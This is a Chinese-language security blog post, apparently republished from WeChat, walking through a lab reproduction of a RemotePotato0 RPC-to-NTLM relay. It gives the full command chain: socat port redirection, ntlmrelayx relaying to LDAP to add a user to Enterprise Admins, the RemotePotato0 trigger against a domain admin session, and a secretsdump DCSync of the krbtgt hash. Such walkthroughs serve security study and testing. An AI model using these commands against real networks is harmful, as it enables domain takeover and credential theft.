复现RPC中继NTLM身份验证

admin 2023年12月11日08:40:00评论19 views字数 768阅读2分33秒阅读模式

滥用 DCOM 激活服务的方法,即解组IStorage对象并将 NTLM 反射回本地 RPC TCP 端点以实现本地权限提升。虽然此漏洞已被修补,但 DCOM 激活服务曾经(现在仍然是)用于 RPC 身份验证的有效触发器。

复现环境:

DC: 10.10.10.139

受害者机器:10.10.10.140

攻击机:10.10.10.178

首先查看用户的会话 可以看到这里有域管的一个会话 可以看他的会话ID为1

复现RPC中继NTLM身份验证

然后我们到攻击机进行重定向转发

需要您在vps上重定向转发 sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:(目标机器):9997 &

sudo socat TCP-LISTEN:135,fork,reuseaddr TCP:10.10.10.124:9997 &

复现RPC中继NTLM身份验证

进行Ntlm中继监听

python3 ntlmrelayx.py -t ldap://10.10.10.139 --no-wcf-server --escalate-user win2016  这里中继到ldap --escalate-user 这个参数是你要提升权限的用户

复现RPC中继NTLM身份验证

接着我们去受害机器触发

.RemotePotato0.exe -m 0 -r 10.10.10.178 -p 9998 -s 1

这里-s 1 是会话ID为1的域管

复现RPC中继NTLM身份验证

接着来到攻击机

复现RPC中继NTLM身份验证

复现RPC中继NTLM身份验证

可以看到这里已经权限提升成功了 此时win2016这个域用户 就拥有了企业管理员的权限 我们回到受害机可以看到 已经在Enterprise Admins组里面了

复现RPC中继NTLM身份验证

复现RPC中继NTLM身份验证

dc上也可以看到 这里已经添加成功了

此时我们就可以dcsync了

 python3 secretsdump.py Rt/win2016:Admin123..@10.10.10.139 -dc-ip 10.10.10.139 -just-dc-user krbtgt

复现RPC中继NTLM身份验证


原文始发于微信公众号(Relay学安全):复现RPC中继NTLM身份验证

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月11日08:40:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   复现RPC中继NTLM身份验证http://cn-sec.com/archives/2285704.html

发表评论

匿名网友 填写信息